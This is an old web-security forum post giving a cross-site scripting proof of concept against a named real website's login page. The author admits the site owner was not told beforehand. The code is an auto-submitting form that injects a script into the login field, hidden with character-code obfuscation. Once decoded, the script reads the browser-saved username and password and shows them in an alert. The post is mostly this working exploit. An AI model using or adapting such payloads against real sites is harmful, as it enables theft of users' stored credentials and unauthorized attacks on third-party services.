If you guys want a simpler PoC go to http://www.space4k.com/gw/login.php, log in with any incorrect data, store the data. Then go here: http://www.whiteacid.org/misc/space4k.com.html
I will most likely remove that link later, so it's code is:
<script>
//<!--
function foo()
{
document.getElementById('ln').value = "\"><script>setTimeout(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,56,44,49,49,48,41,41,91,48,93,46,118,97,108,117,101,43,39,58,39,43,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,50,44,49,49,57,41,41,91,48,93,46,118,97,108,117,101,41),2000)</script>"
document.getElementById('asd').submit()
}
//-->
</script>
<body onload="foo()">
<form action="http://www.space4k.com/gw/login.php" id="asd" method="POST">
<input id="ln" name="ln"/>
<input name="pw"/>
</form>
Again, use http://www.whiteacid.org/misc/code%20to%20string.html to convert those numbers to ASCII characters if you want to understand the code.
Are we really allowed to post things like this? space4k.com has no idea I made this PoC. I'll let them know now.
Don't forget our IRC: irc://irc.irchighway.net/#slackers
-
WhiteAcid - your friendly, very lazy, web developer
Edited 1 time(s). Last edit at 08/23/2006 02:38PM by WhiteAcid.